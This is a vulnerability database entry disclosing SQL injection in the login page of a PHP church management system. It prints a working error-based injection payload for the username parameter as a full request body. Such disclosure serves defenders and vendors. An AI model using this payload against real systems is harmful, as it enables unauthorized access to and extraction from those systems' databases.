| 标题 | Church Management System-SQL injections |
|---|
| 描述 | Church Management System-SQL injections
Date: 2022-08/06
Exploit Author: [email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/11206/church-management-system.html
Version: 1.0
/login.php
username、passwordParameters have SQL injection
payload
login=Login&password=admin&username=' OR (SELECT 7064 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(7064=7064,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jURL |
|---|
| 来源 | ⚠️ https://github.com/anx0ing/CVE_demo/blob/main/2022/Church%20Management%20System-SQL%20injections.md |
|---|
| 用户 | anx0ing (UID 30698) |
|---|
| 提交 | 2022-08-05 20時17分 (4 年前) |
|---|
| 管理 | 2022-08-05 20時50分 (33 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 205668 [SourceCodester Church Management System 1.0 /login.php 用户名 SQL注入] |
|---|
| 积分 | 20 |
|---|